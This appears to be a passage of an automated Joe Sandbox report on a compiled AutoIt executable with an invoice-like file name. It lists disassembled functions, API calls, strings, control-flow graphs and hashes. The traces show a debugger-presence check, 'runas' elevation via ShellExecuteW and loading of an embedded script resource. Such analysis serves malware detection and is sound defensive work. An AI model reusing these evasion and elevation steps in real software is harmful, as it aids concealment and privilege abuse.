                            • Instruction ID: 5d349ddb6c563350a502faa4a9121cf9d0dd49b6bca826cce04982da19187bff
                            • Opcode Fuzzy Hash: d6b8a0424962131512bece74feedde033fc7021fba475b674d5e9915af5efedb
                            • Instruction Fuzzy Hash: E0322C75B026288FDB248FA9DC44AE9B7F5FB4B310F4941D9E40AA7A51D7309E80CF52
                            Function 0008374E Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 145windowCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0008376D
                              • Part of subcall function 00084257: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe,00000104,?,00000000,00000001,00000000), ref: 0008428C
                            • IsDebuggerPresent.KERNEL32(?,?), ref: 0008377F
                            • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe,00000104,?,00141120,C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe,00141124,?,?), ref: 000837EE
                              • Part of subcall function 000834F3: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 0008352A
                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00083860
                            • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00132934,00000010), ref: 000F21C5
                            • SetCurrentDirectoryW.KERNEL32(?,?), ref: 000F21FD
                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?), ref: 000F2232
                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0011DAA4), ref: 000F2290
                            • ShellExecuteW.SHELL32(00000000), ref: 000F2297
                              • Part of subcall function 000830A5: GetSysColorBrush.USER32(0000000F), ref: 000830B0
                              • Part of subcall function 000830A5: LoadCursorW.USER32(00000000,00007F00), ref: 000830BF
                              • Part of subcall function 000830A5: LoadIconW.USER32(00000063), ref: 000830D5
                              • Part of subcall function 000830A5: LoadIconW.USER32(000000A4), ref: 000830E7
                              • Part of subcall function 000830A5: LoadIconW.USER32(000000A2), ref: 000830F9
                              • Part of subcall function 000830A5: RegisterClassExW.USER32(?), ref: 00083167
                              • Part of subcall function 00082E9D: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00082ECB
                              • Part of subcall function 00082E9D: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00082EEC
                              • Part of subcall function 00082E9D: ShowWindow.USER32(00000000), ref: 00082F00
                              • Part of subcall function 00082E9D: ShowWindow.USER32(00000000), ref: 00082F09
                              • Part of subcall function 00083598: _memset.LIBCMT ref: 000835BE
                              • Part of subcall function 00083598: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00083667
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$IconLoadName$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                            • String ID: C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                            • API String ID: 4253510256-1219970503
                            • Opcode ID: 5034d0e7d815cf32e835f87d79d7d01b55533737861527e1554761e2aa32b296
                            • Instruction ID: 3d0561ae779ea26810bac27673b2f5fe15ac0075e5bba3e9b218574db01fa2c4
                            • Opcode Fuzzy Hash: 5034d0e7d815cf32e835f87d79d7d01b55533737861527e1554761e2aa32b296
                            • Instruction Fuzzy Hash: 2951B678644248BADB10BBB4EC46FED3B78BB55F14F000055F7C1A65A2DBB04AC5DB62
                            Function 0009E47B Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1208 9e47b-9e50a call 8d3d2 GetVersionExW call 87e53 call 9e5f8 call 9e617 1217 f29f9-f29fc 1208->1217 1218 9e510-9e511 1208->1218 1219 f29fe 1217->1219 1220 f2a15-f2a19 1217->1220 1221 9e54d-9e55d call 9e6d1 1218->1221 1222 9e513-9e51e 1218->1222 1224 f2a01 1219->1224 1225 f2a1b-f2a24 1220->1225 1226 f2a04-f2a0d 1220->1226 1235 9e55f-9e57c GetCurrentProcess call 9e70e 1221->1235 1236 9e582-9e59c 1221->1236 1227 f297f-f2985 1222->1227 1228 9e524-9e526 1222->1228 1224->1226 1225->1224 1232 f2a26-f2a29 1225->1232 1226->1220 1230 f298f-f2995 1227->1230 1231 f2987-f298a 1227->1231 1233 f299a-f29a6 1228->1233 1234 9e52c-9e52f 1228->1234 1230->1221 1231->1221 1232->1226 1237 f29a8-f29ab 1233->1237 1238 f29b0-f29b6 1233->1238 1239 f29c6-f29c9 1234->1239 1240 9e535-9e544 1234->1240 1235->1236 1259 9e57e 1235->1259 1245 9e5ec-9e5f6 GetSystemInfo 1236->1245 1246 9e59e-9e5b2 call 9e694 1236->1246 1237->1221 1238->1221 1239->1221 1241 f29cf-f29e4 1239->1241 1242 9e54a 1240->1242 1243 f29bb-f29c1 1240->1243 1247 f29ee-f29f4 1241->1247 1248 f29e6-f29e9 1241->1248 1242->1221 1243->1221 1250 9e5c9-9e5d5 1245->1250 1256 9e5e4-9e5ea GetSystemInfo 1246->1256 1257 9e5b4-9e5bc call 9e437 GetNativeSystemInfo 1246->1257 1247->1221 1248->1221 1252 9e5dc-9e5e1 1250->1252 1253 9e5d7-9e5da FreeLibrary 1250->1253 1253->1252 1258 9e5be-9e5c2 1256->1258 1257->1258 1258->1250 1262 9e5c4-9e5c7 FreeLibrary 1258->1262 1259->1236 1262->1250
                            APIs
                            • GetVersionExW.KERNEL32(?), ref: 0009E4A7
                              • Part of subcall function 00087E53: _memmove.LIBCMT ref: 00087EB9
                            • GetCurrentProcess.KERNEL32(00000000,0011DC28,?,?), ref: 0009E567
                            • GetNativeSystemInfo.KERNEL32(?,0011DC28,?,?), ref: 0009E5BC
                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0009E5C7
                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 0009E5DA
                            • GetSystemInfo.KERNEL32(?,0011DC28,?,?), ref: 0009E5E4
                            • GetSystemInfo.KERNEL32(?,0011DC28,?,?), ref: 0009E5F0
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion_memmove
                            • String ID:
                            • API String ID: 2717633055-0
                            • Opcode ID: c92f10a0652f75cddba9f0cbc1d1fbaebae3987ec4057b080570a8d07c3bca07
                            • Instruction ID: 05c570673896b382955213ee6cfa2ce6fe146245b518e049f03a08069b9d372e
                            • Opcode Fuzzy Hash: c92f10a0652f75cddba9f0cbc1d1fbaebae3987ec4057b080570a8d07c3bca07
                            • Instruction Fuzzy Hash: A66190B18093C4DBCF15CF68D8C11ED7FA46F2A304F1A45D9D8889B24BD674CA48DB66
                            Function 000831F2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1280 831f2-8320a CreateStreamOnHGlobal 1281 8322a-8322d 1280->1281 1282 8320c-83223 FindResourceExW 1280->1282 1283 83229 1282->1283 1284 f57d3-f57e2 LoadResource 1282->1284 1283->1281 1284->1283 1285 f57e8-f57f6 SizeofResource 1284->1285 1285->1283 1286 f57fc-f5807 LockResource 1285->1286 1286->1283 1287 f580d-f5815 1286->1287 1288 f5819-f582b 1287->1288 1288->1283
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00083202
                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000), ref: 00083219
                            • LoadResource.KERNEL32(?,00000000), ref: 000F57D7
                            • SizeofResource.KERNEL32(?,00000000), ref: 000F57EC
                            • LockResource.KERNEL32(?), ref: 000F57FF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                            • String ID: SCRIPT
                            • API String ID: 3051347437-3967369404
                            • Opcode ID: af64eb8e78231516eb4c19670d8d18a8817c9b07c422cb6b83d551c55aaf7200
                            • Instruction ID: f9c6e11b7b532631e7c72495895fe1f76c22c90fd5818989cee4511ec4b35e27
                            • Opcode Fuzzy Hash: af64eb8e78231516eb4c19670d8d18a8817c9b07c422cb6b83d551c55aaf7200
                            • Instruction Fuzzy Hash: 96117C74200701BFE721ABA5FC48F27BBB9FBC9B41F108068F58286560DBB1DD008B60
                            Function 00092B40 Relevance: 6.6, APIs: 2, Strings: 1, Instructions: 1382COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 000A010A: std::exception::exception.LIBCMT ref: 000A013E
                              • Part of subcall function 000A010A: __CxxThrowException@8.LIBCMT ref: 000A0153
                            • _memmove.LIBCMT ref: 00092C63
                            • _memmove.LIBCMT ref: 0009303A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove$Exception@8Throwstd::exception::exception
                            • String ID: @
                            • API String ID: 1300846289-2766056989
                            • Opcode ID: fca705b9b42d05d934f22a5d17b6c938196217cdfa872c62b27280982f9b9de5
                            • Instruction ID: 69380a87acdbf3b616945061e7e1c606ad9f10ec63c2fa25e4b5f18151cb436b
                            • Opcode Fuzzy Hash: fca705b9b42d05d934f22a5d17b6c938196217cdfa872c62b27280982f9b9de5
                            • Instruction Fuzzy Hash: 49C25C74A04209AFCF24DF94C491AEDB7F1BF49300F24806AE945AB352D735EE85EB91
                            Function 0009DD92 Relevance: 4.5, APIs: 3, Instructions: 26fileCOMMON
                            Download Yara Rule
                            APIs
                            • GetFileAttributesW.KERNEL32(0008C848,0008C848), ref: 0009DDA2
                            • FindFirstFileW.KERNEL32(0008C848,?), ref: 000F4A83
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: File$AttributesFindFirst
                            • String ID:
                            • API String ID: 4185537391-0
                            • Opcode ID: 3d7f5b1609c400ce2e61d41db00f3fd8791d32e1e1e638ffbe7fd60c209304f6
                            • Instruction ID: 5e3c9e0e5970b61f72addf5adef5f1584667f55f09bd108a4f8d638de14e70de
                            • Opcode Fuzzy Hash: 3d7f5b1609c400ce2e61d41db00f3fd8791d32e1e1e638ffbe7fd60c209304f6
                            • Instruction Fuzzy Hash: 4CE0D8314154055786246778EC0D8FA379C9B05338B100746F975C14E0EBB49D8095D6
                            Function 00093680 Relevance: 2.5, APIs: 1, Instructions: 986COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: BuffCharUpper
                            • String ID:
                            • API String ID: 3964851224-0
                            • Opcode ID: 4b0ba90ff0599694084ce209053299d25dd29a3017db74be28374ef4521facc8
                            • Instruction ID: e661e944b208d203af5056a22d2eac2d6c0ca49e73252e944aa7b3323e3000ec
                            • Opcode Fuzzy Hash: 4b0ba90ff0599694084ce209053299d25dd29a3017db74be28374ef4521facc8
                            • Instruction Fuzzy Hash: D89279B06083419FDB24DF18C494B6AB7E0BF89304F14885DF99A8B3A2D771ED45DB52
                            Function 0008E1F0 Relevance: 49.8, APIs: 24, Strings: 4, Instructions: 815windowsleeptimeCOMMON
                            Download Yara Rule
                            APIs
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0008E279
                            • timeGetTime.WINMM ref: 0008E51A
                            • TranslateMessage.USER32(?), ref: 0008E646
                            • DispatchMessageW.USER32(?), ref: 0008E651
                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0008E664
                            • LockWindowUpdate.USER32(00000000), ref: 0008E697
                            • DestroyWindow.USER32 ref: 0008E6A3
                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0008E6BD
                            • Sleep.KERNEL32(0000000A), ref: 000F5B15
                            • TranslateMessage.USER32(?), ref: 000F62AF
                            • DispatchMessageW.USER32(?), ref: 000F62BD
                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000F62D1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                            • API String ID: 2641332412-570651680
                            • Opcode ID: bc4f2d1388b53dc9d317cfb25720ea08b5714d15194ca737abd150d5709046c6
                            • Instruction ID: 07a516db7a2fa7e93520e8f5dd177604f519bdf70cbd72569f0cfe46e8171c49
                            • Opcode Fuzzy Hash: bc4f2d1388b53dc9d317cfb25720ea08b5714d15194ca737abd150d5709046c6
                            • Instruction Fuzzy Hash: 2B6202705043849FDB24EF64CC85BAA77E4BF45304F14097DFA8A8B6A2DBB1D884DB52
                            Function 000B6A28 Relevance: 49.6, APIs: 26, Strings: 2, Instructions: 626fileCOMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            • ___createFile.LIBCMT ref: 000B6C73
                            • ___createFile.LIBCMT ref: 000B6CB4
                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000B6CDD
                            • __dosmaperr.LIBCMT ref: 000B6CE4
                            • GetFileType.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000B6CF7
                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000B6D1A
                            • __dosmaperr.LIBCMT ref: 000B6D23
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000B6D2C
                            • __set_osfhnd.LIBCMT ref: 000B6D5C
                            • __lseeki64_nolock.LIBCMT ref: 000B6DC6
                            • __close_nolock.LIBCMT ref: 000B6DEC
                            • __chsize_nolock.LIBCMT ref: 000B6E1C
                            • __lseeki64_nolock.LIBCMT ref: 000B6E2E
                            • __lseeki64_nolock.LIBCMT ref: 000B6F26
                            • __lseeki64_nolock.LIBCMT ref: 000B6F3B
                            • __close_nolock.LIBCMT ref: 000B6F9B
                              • Part of subcall function 000AF84C: CloseHandle.KERNEL32(00000000,0012EEC4,00000000,?,000B6DF1,0012EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000AF89C
                              • Part of subcall function 000AF84C: GetLastError.KERNEL32(?,000B6DF1,0012EEC4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000AF8A6
                              • Part of subcall function 000AF84C: __free_osfhnd.LIBCMT ref: 000AF8B3
                              • Part of subcall function 000AF84C: __dosmaperr.LIBCMT ref: 000AF8D5
                              • Part of subcall function 000A889E: __getptd_noexit.LIBCMT ref: 000A889E
                            • __lseeki64_nolock.LIBCMT ref: 000B6FBD
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000B70F2
                            • ___createFile.LIBCMT ref: 000B7111
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000B711E
                            • __dosmaperr.LIBCMT ref: 000B7125
                            • __free_osfhnd.LIBCMT ref: 000B7145
                            • __invoke_watson.LIBCMT ref: 000B7173
                            • __wsopen_helper.LIBCMT ref: 000B718D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                            • String ID: 9A$@
                            • API String ID: 3896587723-3273144146
                            • Opcode ID: cef9af26a4bdabd1fe27774a9d8f42d6983b3ca27060ae1321461d565734fb91
                            • Instruction ID: 433e4a87096c47d33c0f11115852c2458f35126c567e4217551a7caf1e255c4b
                            • Opcode Fuzzy Hash: cef9af26a4bdabd1fe27774a9d8f42d6983b3ca27060ae1321461d565734fb91
                            • Instruction Fuzzy Hash: 062227719041069BEF259FA8DC51BFE7BB1EB05324F244229E525AB2E2CB3ECD90C751
                            Function 000D01E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 546 d01e4-d020b 547 d020d-d021f call 8cdb4 546->547 548 d0221 546->548 547->548 549 d0226-d0241 call 884a6 call 9f885 547->549 548->549 556 d0247-d024e 549->556 557 d04e6-d04ee 549->557 558 d033c-d034f call 83f9b 556->558 559 d0254-d0282 call 884a6 call a1943 call a3084 556->559 564 d038e-d03c8 call 884a6 call a297d 558->564 565 d0351-d0364 call 83f9b 558->565 578 d0284-d02c2 call a1943 call a1914 call 884a6 call a1914 559->578 579 d02c3-d02f2 call 884a6 call a1943 call c7c0c 559->579 580 d03f9-d0487 call a1943 call a1914 * 3 call 884a6 call c7334 call 9dd84 564->580 581 d03ca-d03d3 564->581 565->564 574 d0366-d0370 call 87ba9 565->574 583 d0375-d0389 call 92570 574->583 578->579 609 d030f-d0334 call 884a6 call c6b3f 579->609 610 d02f4-d030d call a18fb 579->610 627 d048f-d0491 580->627 628 d0489-d048d 580->628 581->580 585 d03d5-d03f6 call a1943 * 2 581->585 583->557 585->580 609->557 622 d033a 609->622 610->583 610->609 622->583 629 d0493-d04b1 call 884a6 call cc890 627->629 630 d04c9-d04d6 call 92570 627->630 628->627 628->629 637 d04b6-d04b8 629->637 636 d04dd-d04e1 call 83e39 630->636 636->557 637->636 639 d04ba-d04c4 call 87ba9 637->639 639->630
                            APIs
                            • _wcscpy.LIBCMT ref: 000D026A
                            • _wcschr.LIBCMT ref: 000D0278
                            • _wcscpy.LIBCMT ref: 000D028F
                            • _wcscat.LIBCMT ref: 000D029E
                            • _wcscat.LIBCMT ref: 000D02BC
                            • _wcscpy.LIBCMT ref: 000D02DD
                            • __wsplitpath.LIBCMT ref: 000D03BA
                            • _wcscpy.LIBCMT ref: 000D03DF
                            • _wcscpy.LIBCMT ref: 000D03F1
                            • _wcscpy.LIBCMT ref: 000D0406
                            • _wcscat.LIBCMT ref: 000D041B
                            • _wcscat.LIBCMT ref: 000D042D
                            • _wcscat.LIBCMT ref: 000D0442
                              • Part of subcall function 000CC890: _wcscmp.LIBCMT ref: 000CC92A
                              • Part of subcall function 000CC890: __wsplitpath.LIBCMT ref: 000CC96F
                              • Part of subcall function 000CC890: _wcscpy.LIBCMT ref: 000CC982
                              • Part of subcall function 000CC890: _wcscat.LIBCMT ref: 000CC995
                              • Part of subcall function 000CC890: __wsplitpath.LIBCMT ref: 000CC9BA
                              • Part of subcall function 000CC890: _wcscat.LIBCMT ref: 000CC9D0
                              • Part of subcall function 000CC890: _wcscat.LIBCMT ref: 000CC9E3
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                            • String ID: >>>AUTOIT SCRIPT<<<
                            • API String ID: 2955681530-2806939583
                            • Opcode ID: 98eb9b911abc133275ba5ca5de3ba21625618542a1b17cdfd4f9b486992a1856
                            • Instruction ID: 4523d065ad966b2813675f7afc126e654ea69d4c6493263e7f6c26c7ee985c04
                            • Opcode Fuzzy Hash: 98eb9b911abc133275ba5ca5de3ba21625618542a1b17cdfd4f9b486992a1856
                            • Instruction Fuzzy Hash: E1918F72504701AFCB24EB50C955FDBB3E8BF84310F04885EF5899B252EB34EA44CB62
                            Function 00082F58 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 53windowregistryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetSysColorBrush.USER32(0000000F), ref: 00082F8B
                            • RegisterClassExW.USER32(00000030), ref: 00082FB5
                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00082FC6
                            • InitCommonControlsEx.COMCTL32(?), ref: 00082FE3
                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00082FF3
                            • LoadIconW.USER32(000000A9), ref: 00083009
                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00083018
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated$3So
                            • API String ID: 2914291525-1322758227
                            • Opcode ID: a6209d7378351a8d4caab5aa7410d6063041e8c96ee09df34d9eaaaaa70962ee
                            • Instruction ID: 1f38ac0ace676fe0a8a7da0ec13d8f5671fd25e58198ba1dd713700293d6eb5d
                            • Opcode Fuzzy Hash: a6209d7378351a8d4caab5aa7410d6063041e8c96ee09df34d9eaaaaa70962ee
                            • Instruction Fuzzy Hash: 0421C0B9900319AFDB009FE4E889BCEBBF4FB09704F00461AF655A66A0D7B545C4CF91
                            Function 00084257 Relevance: 19.5, APIs: 4, Strings: 7, Instructions: 235COMMON
                            Download Yara Rule

                            Control-flow Graph

                            APIs
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe,00000104,?,00000000,00000001,00000000), ref: 0008428C
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                              • Part of subcall function 000A1BC7: __wcsicmp_l.LIBCMT ref: 000A1C50
                            • _wcscpy.LIBCMT ref: 000843C0
                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\r3T-ENQ-O-2024-10856.exe,00000104,?,?,?,?,00000000,CMDLINE,?,?,00000100,00000000,CMDLINE,?,?), ref: 000F214E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
